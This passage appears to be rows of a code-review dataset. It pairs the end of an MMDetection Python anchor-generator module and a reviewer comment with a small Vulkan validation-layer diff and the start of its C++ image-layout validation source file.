min(int(np.ceil(h / anchor_stride[0])), feat_h) valid_feat_w = min(int(np.ceil(w / anchor_stride[1])), feat_w) flags = self.single_level_valid_flags((feat_h, feat_w), (valid_feat_h, valid_feat_w), self.num_base_anchors[i], device=device) multi_level_flags.append(flags) return multi_level_flags def single_level_valid_flags(self, featmap_size, valid_size, num_base_anchors, device='cuda'): """Generate the valid flags of anchor in a single feature map. Args: featmap_size (tuple[int]): The size of feature maps. valid_size (tuple[int]): The valid size of the feature maps. num_base_anchors (int): The number of base anchors. device (str, optional): Device where the flags will be put on. Defaults to 'cuda'. Returns: torch.Tensor: The valid flags of each anchor in a single level \ feature map. """ feat_h, feat_w = featmap_size valid_h, valid_w = valid_size assert valid_h <= feat_h and valid_w <= feat_w valid_x = torch.zeros(feat_w, dtype=torch.bool, device=device) valid_y = torch.zeros(feat_h, dtype=torch.bool, device=device) valid_x[:valid_w] = 1 valid_y[:valid_h] = 1 valid_xx, valid_yy = self._meshgrid(valid_x, valid_y) valid = valid_xx & valid_yy valid = valid[:, None].expand(valid.size(0), num_base_anchors).contiguous().view(-1) return valid def __repr__(self): """str: a string that describes the module""" indent_str = ' ' repr_str = self.__class__.__name__ + '(\n' repr_str += f'{indent_str}strides={self.strides},\n' repr_str += f'{indent_str}ratios={self.ratios},\n' repr_str += f'{indent_str}scales={self.scales},\n' repr_str += f'{indent_str}base_sizes={self.base_sizes},\n' repr_str += f'{indent_str}scale_major={self.scale_major},\n' repr_str += f'{indent_str}octave_base_scale=' repr_str += f'{self.octave_base_scale},\n' repr_str += f'{indent_str}scales_per_octave=' repr_str += f'{self.scales_per_octave},\n' repr_str += f'{indent_str}num_levels={self.num_levels}\n' repr_str += f'{indent_str}centers={self.centers},\n' repr_str += f'{indent_str}center_offset={self.center_offset})' return repr_str @ANCHOR_GENERATORS.register_module() class SSDAnchorGenerator(AnchorGenerator): """Anchor generator for SSD. Args: strides (list[int] | list[tuple[int, int]]): Strides of anchors in multiple feature levels. ratios (list[float]): The list of ratios between the height and width of anchors in a single level. basesize_ratio_range (tuple(float)): Ratio range of anchors. input_size (int): Size of feature map, 300 for SSD300, 512 for SSD512. scale_major (bool): Whether to multiply scales first when generating base anchors. If true, the anchors in the same row will have the same scales. It is always set to be False in SSD. """ def __init__(self, strides, ratios, basesize_ratio_range, input_size=300, scale_major=True): assert len(strides) == len(ratios) assert mmcv.is_tuple_of(basesize_ratio_range, float) self.strides = [_pair(stride) for stride in strides] self.input_size = input_size self.centers = [(stride[0] / 2., stride[1] / 2.) for stride in self.strides] self.basesize_ratio_range = basesize_ratio_range # calculate anchor ratios and sizes min_ratio, max_ratio = basesize_ratio_range min_ratio = int(min_ratio * 100) max_ratio = int(max_ratio * 100) step = int(np.floor(max_ratio - min_ratio) / (self.num_levels - 2)) min_sizes = [] max_sizes = [] for ratio in range(int(min_ratio), int(max_ratio) + 1, step): min_sizes.append(int(self.input_size * ratio / 100)) max_sizes.append(int(self.input_size * (ratio + step) / 100)) if self.input_size == 300: if basesize_ratio_range[0] == 0.15: # SSD300 COCO min_sizes.insert(0, int(self.input_size * 7 / 100)) max_sizes.insert(0, int(self.input_size * 15 / 100)) elif basesize_ratio_range[0] == 0.2: # SSD300 VOC min_sizes.insert(0, int(self.input_size * 10 / 100)) max_sizes.insert(0, int(self.input_size * 20 / 100)) else: raise ValueError( 'basesize_ratio_range[0] should be either 0.15' 'or 0.2 when input_size is 300, got ' f'{basesize_ratio_range[0]}.') elif self.input_size == 512: if basesize_ratio_range[0] == 0.1: # SSD512 COCO min_sizes.insert(0, int(self.input_size * 4 / 100)) max_sizes.insert(0, int(self.input_size * 10 / 100)) elif basesize_ratio_range[0] == 0.15: # SSD512 VOC min_sizes.insert(0, int(self.input_size * 7 / 100)) max_sizes.insert(0, int(self.input_size * 15 / 100)) else: raise ValueError('basesize_ratio_range[0] should be either 0.1' 'or 0.15 when input_size is 512, got' ' {basesize_ratio_range[0]}.') else: raise ValueError('Only support 300 or 512 in SSDAnchorGenerator' f', got {self.input_size}.') anchor_ratios = [] anchor_scales = [] for k in range(len(self.strides)): scales = [1., np.sqrt(max_sizes[k] / min_sizes[k])] anchor_ratio = [1.] for r in ratios[k]: anchor_ratio += [1 / r, r] # 4 or 6 ratio anchor_ratios.append(torch.Tensor(anchor_ratio)) anchor_scales.append(torch.Tensor(scales)) self.base_sizes = min_sizes self.scales = anchor_scales self.ratios = anchor_ratios self.scale_major = scale_major self.center_offset = 0 self.base_anchors = self.gen_base_anchors() def gen_base_anchors(self): """Generate base anchors. Returns: list(torch.Tensor): Base anchors of a feature grid in multiple \ feature levels. """ multi_level_base_anchors = [] for i, base_size in enumerate(self.base_sizes): base_anchors = self.gen_single_level_base_anchors( base_size, scales=self.scales[i], ratios=self.ratios[i], center=self.centers[i]) indices = list(range(len(self.ratios[i]))) indices.insert(1, len(indices)) base_anchors = torch.index_select(base_anchors, 0, torch.LongTensor(indices)) multi_level_base_anchors.append(base_anchors) return multi_level_base_anchors def __repr__(self): """str: a string that describes the module""" indent_str = ' ' repr_str = self.__class__.__name__ + '(\n' repr_str += f'{indent_str}strides={self.strides},\n' repr_str += f'{indent_str}scales={self.scales},\n' repr_str += f'{indent_str}scale_major={self.scale_major},\n' repr_str += f'{indent_str}input_size={self.input_size},\n' repr_str += f'{indent_str}scales={self.scales},\n' repr_str += f'{indent_str}ratios={self.ratios},\n' repr_str += f'{indent_str}num_levels={self.num_levels},\n' repr_str += f'{indent_str}base_sizes={self.base_sizes},\n' repr_str += f'{indent_str}basesize_ratio_range=' repr_str += f'{self.basesize_ratio_range})' return repr_str @ANCHOR_GENERATORS.register_module() class LegacyAnchorGenerator(AnchorGenerator): """Legacy anchor generator used in MMDetection V1.x. Note: Difference to the V2.0 anchor generator: 1. The center offset of V1.x anchors are set to be 0.5 rather than 0. 2. The width/height are minused by 1 when calculating the anchors' \ centers and corners to meet the V1.x coordinate system. 3. The anchors' corners are quantized. Args: strides (list[int] | list[tuple[int]]): Strides of anchors in multiple feature levels. ratios (list[float]): The list of ratios between the height and width of anchors in a single level. scales (list[int] | None): Anchor scales for anchors in a single level. It cannot be set at the same time if `octave_base_scale` and `scales_per_octave` are set. base_sizes (list[int]): The basic sizes of anchors in multiple levels. If None is given, strides will be used to generate base_sizes. scale_major (bool): Whether to multiply scales first when generating base anchors. If true, the anchors in the same row will have the same scales. By default it is True in V2.0 octave_base_scale (int): The base scale of octave. scales_per_octave (int): Number of scales for each octave. `octave_base_scale` and `scales_per_octave` are usually used in retinanet and the `scales` should be None when they are set. centers (list[tuple[float, float]] | None): The centers of the anchor relative to the feature grid center in multiple feature levels. By default it is set to be None and not used. It a list of float is given, this list will be used to shift the centers of anchors. center_offset (float): The offset of center in propotion to anchors' width and height. By default it is 0.5 in V2.0 but it should be 0.5 in v1.x models. Examples: >>> from mmdet.core import LegacyAnchorGenerator >>> self = LegacyAnchorGenerator( >>> [16], [1.], [1.], [9], center_offset=0.5) >>> all_anchors = self.grid_anchors(((2, 2),), device='cpu') >>> print(all_anchors) [tensor([[ 0., 0., 8., 8.], [16., 0., 24., 8.], [ 0., 16., 8., 24.], [16., 16., 24., 24.]])] """ def gen_single_level_base_anchors(self, base_size, scales, ratios, center=None): """Generate base anchors of a single level. Note: The width/height of anchors are minused by 1 when calculating \ the centers and corners to meet the V1.x coordinate system. Args: base_size (int | float): Basic size of an anchor. scales (torch.Tensor): Scales of the anchor. ratios (torch.Tensor): The ratio between between the height. and width of anchors in a single level. center (tuple[float], optional): The center of the base anchor related to a single feature grid. Defaults to None. Returns: torch.Tensor: Anchors in a single-level feature map. """ w = base_size h = base_size if center is None: x_center = self.center_offset * (w - 1) y_center = self.center_offset * (h - 1) else: x_center, y_center = center h_ratios = torch.sqrt(ratios) w_ratios = 1 / h_ratios if self.scale_major: ws = (w * w_ratios[:, None] * scales[None, :]).view(-1) hs = (h * h_ratios[:, None] * scales[None, :]).view(-1) else: ws = (w * scales[:, None] * w_ratios[None, :]).view(-1) hs = (h * scales[:, None] * h_ratios[None, :]).view(-1) # use float anchor and the anchor's center is aligned with the # pixel center base_anchors = [ x_center - 0.5 * (ws - 1), y_center - 0.5 * (hs - 1), x_center + 0.5 * (ws - 1), y_center + 0.5 * (hs - 1) ] base_anchors = torch.stack(base_anchors, dim=-1).round() return base_anchors @ANCHOR_GENERATORS.register_module() class LegacySSDAnchorGenerator(SSDAnchorGenerator, LegacyAnchorGenerator): """Legacy anchor generator used in MMDetection V1.x. The difference between `LegacySSDAnchorGenerator` and `SSDAnchorGenerator` can be found in `LegacyAnchorGenerator`. """ def __init__(self, strides, ratios, basesize_ratio_range, input_size=300, scale_major=True): super(LegacySSDAnchorGenerator, self).__init__(strides, ratios, basesize_ratio_range, input_size, scale_major) self.centers = [((stride - 1) / 2., (stride - 1) / 2.) for stride in strides] self.base_anchors = self.gen_base_anchors() @ANCHOR_GENERATORS.register_module() class YOLOAnchorGenerator(AnchorGenerator): """Anchor generator for YOLO. Args: strides (list[int] | list[tuple[int, int]]): Strides of anchors in multiple feature levels. base_sizes (list[list[tuple[int, int]]]): The basic sizes of anchors in multiple levels. """ def __init__(self, strides, base_sizes): self.strides = [_pair(stride) for stride in strides] self.centers = [(stride[0] / 2., stride[1] / 2.) for stride in self.strides] self.base_sizes = [] num_anchor_per_level = len(base_sizes[0]) for base_sizes_per_level in base_sizes: assert num_anchor_per_level == len(base_sizes_per_level) self.base_sizes.append( [_pair(base_size) for base_size in base_sizes_per_level]) self.base_anchors = self.gen_base_anchors() @property def num_levels(self): """int: number of feature levels that the generator will be applied""" return len(self.base_sizes) def gen_base_anchors(self): """Generate base anchors. Returns: list(torch.Tensor): Base anchors of a feature grid in multiple \ feature levels. """ multi_level_base_anchors = [] for i, base_sizes_per_level in enumerate(self.base_sizes): center = None if self.centers is not None: center = self.centers[i] multi_level_base_anchors.append( self.gen_single_level_base_anchors(base_sizes_per_level, center)) return multi_level_base_anchors def gen_single_level_base_anchors(self, base_sizes_per_level, center=None): """Generate base anchors of a single level. Args: base_sizes_per_level (list[tuple[int, int]]): Basic sizes of anchors. center (tuple[float], optional): The center of the base anchor related to a single feature grid. Defaults to None. Returns: torch.Tensor: Anchors in a single-level feature maps. """ x_center, y_center = center base_anchors = [] for base_size in base_sizes_per_level: w, h = base_size # use float anchor and the anchor's center is aligned with the # pixel center base_anchor = torch.Tensor([ x_center - 0.5 * w, y_center - 0.5 * h, x_center + 0.5 * w, y_center + 0.5 * h ]) base_anchors.append(base_anchor) base_anchors = torch.stack(base_anchors, dim=0) return base_anchors def responsible_flags(self, featmap_sizes, gt_bboxes, device='cuda'): """Generate responsible anchor flags of grid cells in multiple scales. Args: featmap_sizes (list(tuple)): List of feature map sizes in multiple feature levels. gt_bboxes (Tensor): Ground truth boxes, shape (n, 4). device (str): Device where the anchors will be put on. Return: list(torch.Tensor): responsible flags of anchors in multiple level """ assert self.num_levels == len(featmap_sizes) multi_level_responsible_flags = [] for i in range(self.num_levels): anchor_stride = self.strides[i] flags = self.single_level_responsible_flags( featmap_sizes[i], gt_bboxes, anchor_stride, self.num_base_anchors[i], device=device) multi_level_responsible_flags.append(flags) return multi_level_responsible_flags def single_level_responsible_flags(self, featmap_size, gt_bboxes, stride, num_base_anchors, device='cuda'): """Generate the responsible flags of anchor in a single feature map. Args: featmap_size (tuple[int]): The size of feature maps. gt_bboxes (Tensor): Ground truth boxes, shape (n, 4). stride (tuple(int)): stride of current level num_base_anchors (int): The number of base anchors. device (str, optional): Device where the flags will be put on. Defaults to 'cuda'. Returns: torch.Tensor: The valid flags of each anchor in a single level \ feature map. """ feat_h, feat_w = featmap_size gt_bboxes_cx = ((gt_bboxes[:, 0] + gt_bboxes[:, 2]) * 0.5).to(device) gt_bboxes_cy = ((gt_bboxes[:, 1] + gt_bboxes[:, 3]) * 0.5).to(device) gt_bboxes_grid_x = torch.floor(gt_bboxes_cx / stride[0]).long() gt_bboxes_grid_y = torch.floor(gt_bboxes_cy / stride[1]).long() # row major indexing gt_bboxes_grid_idx = gt_bboxes_grid_y * feat_w + gt_bboxes_grid_x responsible_grid = torch.zeros( feat_h * feat_w, dtype=torch.uint8, device=device) responsible_grid[gt_bboxes_grid_idx] = 1 responsible_grid = responsible_grid[:, None].expand( responsible_grid.size(0), num_base_anchors).contiguous().view(-1) return responsible_grid
1
21,274
We may also update the docstring in the AnchorGenerator's arguments at around line 15.
open-mmlab-mmdetection
py
@@ -930,7 +930,7 @@ bool CoreChecks::ValidateAndUpdateQFOScoreboard(const debug_report_data *report_ " duplicates existing barrier submitted in this batch from command buffer %s.", "vkQueueSubmit()", BarrierRecord::BarrierName(), operation, BarrierRecord::HandleName(), report_data->FormatHandle(barrier.handle).c_str(), barrier.srcQueueFamilyIndex, barrier.dstQueueFamilyIndex, - report_data->FormatHandle(inserted.first->second).c_str()); + report_data->FormatHandle(inserted.first->second->commandBuffer).c_str()); } return skip; }
1
/* Copyright (c) 2015-2019 The Khronos Group Inc. * Copyright (c) 2015-2019 Valve Corporation * Copyright (c) 2015-2019 LunarG, Inc. * Copyright (C) 2015-2019 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * Author: Mark Lobodzinski <[email protected]> * Author: Dave Houlton <[email protected]> * Shannon McPherson <[email protected]> */ // Allow use of STL min and max functions in Windows #define NOMINMAX #include <cmath> #include <set> #include <sstream> #include <string> #include "vk_enum_string_helper.h" #include "vk_layer_data.h" #include "vk_layer_utils.h" #include "vk_layer_logging.h" #include "vk_typemap_helper.h" #include "chassis.h" #include "core_validation.h" #include "shader_validation.h" #include "descriptor_sets.h" #include "buffer_validation.h" uint32_t FullMipChainLevels(uint32_t height, uint32_t width, uint32_t depth) { // uint cast applies floor() return 1u + (uint32_t)log2(std::max({height, width, depth})); } uint32_t FullMipChainLevels(VkExtent3D extent) { return FullMipChainLevels(extent.height, extent.width, extent.depth); } uint32_t FullMipChainLevels(VkExtent2D extent) { return FullMipChainLevels(extent.height, extent.width); } void CoreChecks::SetLayout(GLOBAL_CB_NODE *pCB, ImageSubresourcePair imgpair, const VkImageLayout &layout) { auto it = pCB->imageLayoutMap.find(imgpair); if (it != pCB->imageLayoutMap.end()) { it->second.layout = layout; } else { assert(imgpair.hasSubresource); IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(pCB, imgpair.image, imgpair.subresource, node)) { node.initialLayout = layout; } SetLayout(pCB, imgpair, {node.initialLayout, layout}); } } template <class OBJECT, class LAYOUT> void CoreChecks::SetLayout(OBJECT *pObject, VkImage image, VkImageSubresource range, const LAYOUT &layout) { ImageSubresourcePair imgpair = {image, true, range}; SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_COLOR_BIT); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_DEPTH_BIT); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_STENCIL_BIT); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); SetLayout(pObject, imgpair, layout, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } } template <class OBJECT, class LAYOUT> void CoreChecks::SetLayout(OBJECT *pObject, ImageSubresourcePair imgpair, const LAYOUT &layout, VkImageAspectFlags aspectMask) { if (imgpair.subresource.aspectMask & aspectMask) { imgpair.subresource.aspectMask = aspectMask; SetLayout(pObject, imgpair, layout); } } // Set the layout in supplied map void CoreChecks::SetLayout(std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &imageLayoutMap, ImageSubresourcePair imgpair, VkImageLayout layout) { auto it = imageLayoutMap.find(imgpair); if (it != imageLayoutMap.end()) { it->second.layout = layout; // Update } else { imageLayoutMap[imgpair].layout = layout; // Insert } } bool CoreChecks::FindLayoutVerifyNode(GLOBAL_CB_NODE const *pCB, ImageSubresourcePair imgpair, IMAGE_CMD_BUF_LAYOUT_NODE &node, const VkImageAspectFlags aspectMask) { if (!(imgpair.subresource.aspectMask & aspectMask)) { return false; } VkImageAspectFlags oldAspectMask = imgpair.subresource.aspectMask; imgpair.subresource.aspectMask = aspectMask; auto imgsubIt = pCB->imageLayoutMap.find(imgpair); if (imgsubIt == pCB->imageLayoutMap.end()) { return false; } if (node.layout != VK_IMAGE_LAYOUT_MAX_ENUM && node.layout != imgsubIt->second.layout) { log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(imgpair.image), kVUID_Core_DrawState_InvalidLayout, "Cannot query for VkImage %s layout when combined aspect mask %d has multiple layout types: %s and %s", report_data->FormatHandle(imgpair.image).c_str(), oldAspectMask, string_VkImageLayout(node.layout), string_VkImageLayout(imgsubIt->second.layout)); } if (node.initialLayout != VK_IMAGE_LAYOUT_MAX_ENUM && node.initialLayout != imgsubIt->second.initialLayout) { log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(imgpair.image), kVUID_Core_DrawState_InvalidLayout, "Cannot query for VkImage %s" " layout when combined aspect mask %d has multiple initial layout types: %s and %s", report_data->FormatHandle(imgpair.image).c_str(), oldAspectMask, string_VkImageLayout(node.initialLayout), string_VkImageLayout(imgsubIt->second.initialLayout)); } node = imgsubIt->second; return true; } bool CoreChecks::FindLayoutVerifyLayout(ImageSubresourcePair imgpair, VkImageLayout &layout, const VkImageAspectFlags aspectMask) { if (!(imgpair.subresource.aspectMask & aspectMask)) { return false; } VkImageAspectFlags oldAspectMask = imgpair.subresource.aspectMask; imgpair.subresource.aspectMask = aspectMask; auto imgsubIt = (*GetImageLayoutMap()).find(imgpair); if (imgsubIt == (*GetImageLayoutMap()).end()) { return false; } if (layout != VK_IMAGE_LAYOUT_MAX_ENUM && layout != imgsubIt->second.layout) { log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(imgpair.image), kVUID_Core_DrawState_InvalidLayout, "Cannot query for VkImage %s layout when combined aspect mask %d has multiple layout types: %s and %s", report_data->FormatHandle(imgpair.image).c_str(), oldAspectMask, string_VkImageLayout(layout), string_VkImageLayout(imgsubIt->second.layout)); } layout = imgsubIt->second.layout; return true; } // Find layout(s) on the command buffer level bool CoreChecks::FindCmdBufLayout(GLOBAL_CB_NODE const *pCB, VkImage image, VkImageSubresource range, IMAGE_CMD_BUF_LAYOUT_NODE &node) { ImageSubresourcePair imgpair = {image, true, range}; node = IMAGE_CMD_BUF_LAYOUT_NODE(VK_IMAGE_LAYOUT_MAX_ENUM, VK_IMAGE_LAYOUT_MAX_ENUM); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_COLOR_BIT); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_DEPTH_BIT); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_STENCIL_BIT); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); FindLayoutVerifyNode(pCB, imgpair, node, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } if (node.layout == VK_IMAGE_LAYOUT_MAX_ENUM) { imgpair = {image, false, VkImageSubresource()}; auto imgsubIt = pCB->imageLayoutMap.find(imgpair); if (imgsubIt == pCB->imageLayoutMap.end()) return false; // TODO: This is ostensibly a find function but it changes state here node = imgsubIt->second; } return true; } // Find layout(s) on the global level bool CoreChecks::FindGlobalLayout(ImageSubresourcePair imgpair, VkImageLayout &layout) { layout = VK_IMAGE_LAYOUT_MAX_ENUM; FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_COLOR_BIT); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_DEPTH_BIT); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_STENCIL_BIT); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); FindLayoutVerifyLayout(imgpair, layout, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } if (layout == VK_IMAGE_LAYOUT_MAX_ENUM) { imgpair = {imgpair.image, false, VkImageSubresource()}; auto imgsubIt = (*GetImageLayoutMap()).find(imgpair); if (imgsubIt == (*GetImageLayoutMap()).end()) return false; layout = imgsubIt->second.layout; } return true; } bool CoreChecks::FindLayouts(VkImage image, std::vector<VkImageLayout> &layouts) { auto sub_data = (*GetImageSubresourceMap()).find(image); if (sub_data == (*GetImageSubresourceMap()).end()) return false; auto image_state = GetImageState(image); if (!image_state) return false; bool ignoreGlobal = false; // TODO: Make this robust for >1 aspect mask. Now it will just say ignore potential errors in this case. if (sub_data->second.size() >= (image_state->createInfo.arrayLayers * image_state->createInfo.mipLevels + 1)) { ignoreGlobal = true; } for (auto imgsubpair : sub_data->second) { if (ignoreGlobal && !imgsubpair.hasSubresource) continue; auto img_data = (*GetImageLayoutMap()).find(imgsubpair); if (img_data != (*GetImageLayoutMap()).end()) { layouts.push_back(img_data->second.layout); } } return true; } bool CoreChecks::FindLayout(const std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &imageLayoutMap, ImageSubresourcePair imgpair, VkImageLayout &layout, const VkImageAspectFlags aspectMask) { if (!(imgpair.subresource.aspectMask & aspectMask)) { return false; } imgpair.subresource.aspectMask = aspectMask; auto imgsubIt = imageLayoutMap.find(imgpair); if (imgsubIt == imageLayoutMap.end()) { return false; } layout = imgsubIt->second.layout; return true; } // find layout in supplied map bool CoreChecks::FindLayout(const std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &imageLayoutMap, ImageSubresourcePair imgpair, VkImageLayout &layout) { layout = VK_IMAGE_LAYOUT_MAX_ENUM; FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_COLOR_BIT); FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_DEPTH_BIT); FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_STENCIL_BIT); FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); FindLayout(imageLayoutMap, imgpair, layout, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } // Image+subresource not found, look for image handle w/o subresource if (layout == VK_IMAGE_LAYOUT_MAX_ENUM) { imgpair = {imgpair.image, false, VkImageSubresource()}; auto imgsubIt = imageLayoutMap.find(imgpair); if (imgsubIt == imageLayoutMap.end()) return false; layout = imgsubIt->second.layout; } return true; } // Set the layout on the global level void CoreChecks::SetGlobalLayout(ImageSubresourcePair imgpair, const VkImageLayout &layout) { VkImage &image = imgpair.image; auto &lmap = (*GetImageLayoutMap()); auto data = lmap.find(imgpair); if (data != lmap.end()) { data->second.layout = layout; // Update } else { lmap[imgpair].layout = layout; // Insert } auto &image_subresources = (*GetImageSubresourceMap())[image]; auto subresource = std::find(image_subresources.begin(), image_subresources.end(), imgpair); if (subresource == image_subresources.end()) { image_subresources.push_back(imgpair); } } // Set the layout on the cmdbuf level void CoreChecks::SetLayout(GLOBAL_CB_NODE *pCB, ImageSubresourcePair imgpair, const IMAGE_CMD_BUF_LAYOUT_NODE &node) { auto it = pCB->imageLayoutMap.find(imgpair); if (it != pCB->imageLayoutMap.end()) { it->second = node; // Update } else { pCB->imageLayoutMap[imgpair] = node; // Insert } } // Set image layout for given VkImageSubresourceRange struct void CoreChecks::SetImageLayout(GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *image_state, VkImageSubresourceRange image_subresource_range, const VkImageLayout &layout) { assert(image_state); cb_node->image_layout_change_count++; // Change the version of this data to force revalidation for (uint32_t level_index = 0; level_index < image_subresource_range.levelCount; ++level_index) { uint32_t level = image_subresource_range.baseMipLevel + level_index; for (uint32_t layer_index = 0; layer_index < image_subresource_range.layerCount; layer_index++) { uint32_t layer = image_subresource_range.baseArrayLayer + layer_index; VkImageSubresource sub = {image_subresource_range.aspectMask, level, layer}; // TODO: If ImageView was created with depth or stencil, transition both layouts as the aspectMask is ignored and both // are used. Verify that the extra implicit layout is OK for descriptor set layout validation if (image_subresource_range.aspectMask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT)) { if (FormatIsDepthAndStencil(image_state->createInfo.format)) { sub.aspectMask |= (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT); } } // For multiplane images, IMAGE_ASPECT_COLOR is an alias for all of the plane bits if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { if (FormatIsMultiplane(image_state->createInfo.format)) { if (sub.aspectMask & VK_IMAGE_ASPECT_COLOR_BIT) { sub.aspectMask &= ~VK_IMAGE_ASPECT_COLOR_BIT; sub.aspectMask |= VK_IMAGE_ASPECT_PLANE_0_BIT_KHR | VK_IMAGE_ASPECT_PLANE_1_BIT_KHR; if (FormatPlaneCount(image_state->createInfo.format) > 2) { sub.aspectMask |= VK_IMAGE_ASPECT_PLANE_2_BIT_KHR; } } } } SetLayout(cb_node, image_state->image, sub, layout); } } } // Set image layout for given VkImageSubresourceLayers struct void CoreChecks::SetImageLayout(GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *image_state, VkImageSubresourceLayers image_subresource_layers, const VkImageLayout &layout) { // Transfer VkImageSubresourceLayers into VkImageSubresourceRange struct VkImageSubresourceRange image_subresource_range; image_subresource_range.aspectMask = image_subresource_layers.aspectMask; image_subresource_range.baseArrayLayer = image_subresource_layers.baseArrayLayer; image_subresource_range.layerCount = image_subresource_layers.layerCount; image_subresource_range.baseMipLevel = image_subresource_layers.mipLevel; image_subresource_range.levelCount = 1; SetImageLayout(cb_node, image_state, image_subresource_range, layout); } // Set image layout for all slices of an image view void CoreChecks::SetImageViewLayout(GLOBAL_CB_NODE *cb_node, IMAGE_VIEW_STATE *view_state, const VkImageLayout &layout) { assert(view_state); IMAGE_STATE *image_state = GetImageState(view_state->create_info.image); VkImageSubresourceRange sub_range = view_state->create_info.subresourceRange; // When changing the layout of a 3D image subresource via a 2D or 2D_ARRRAY image view, all depth slices of // the subresource mip level(s) are transitioned, ignoring any layers restriction in the subresource info. if ((image_state->createInfo.imageType == VK_IMAGE_TYPE_3D) && (view_state->create_info.viewType != VK_IMAGE_VIEW_TYPE_3D)) { sub_range.baseArrayLayer = 0; sub_range.layerCount = image_state->createInfo.extent.depth; } SetImageLayout(cb_node, image_state, sub_range, layout); } void CoreChecks::SetImageViewLayout(GLOBAL_CB_NODE *cb_node, VkImageView imageView, const VkImageLayout &layout) { auto view_state = GetImageViewState(imageView); SetImageViewLayout(cb_node, view_state, layout); } bool CoreChecks::ValidateRenderPassLayoutAgainstFramebufferImageUsage(RenderPassCreateVersion rp_version, VkImageLayout layout, VkImage image, VkImageView image_view, VkFramebuffer framebuffer, VkRenderPass renderpass, uint32_t attachment_index, const char *variable_name) { bool skip = false; auto image_state = GetImageState(image); const char *vuid; const bool use_rp2 = (rp_version == RENDER_PASS_VERSION_2); if (!image_state) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-VkRenderPassBeginInfo-framebuffer-parameter", "Render Pass begin with renderpass %s uses framebuffer %s where pAttachments[%" PRIu32 "] = image view %s, which refers to an invalid image", report_data->FormatHandle(renderpass).c_str(), report_data->FormatHandle(framebuffer).c_str(), attachment_index, report_data->FormatHandle(image_view).c_str()); return skip; } auto image_usage = image_state->createInfo.usage; // Check for layouts that mismatch image usages in the framebuffer if (layout == VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL && !(image_usage & VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT)) { vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03094" : "VUID-vkCmdBeginRenderPass-initialLayout-00895"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with 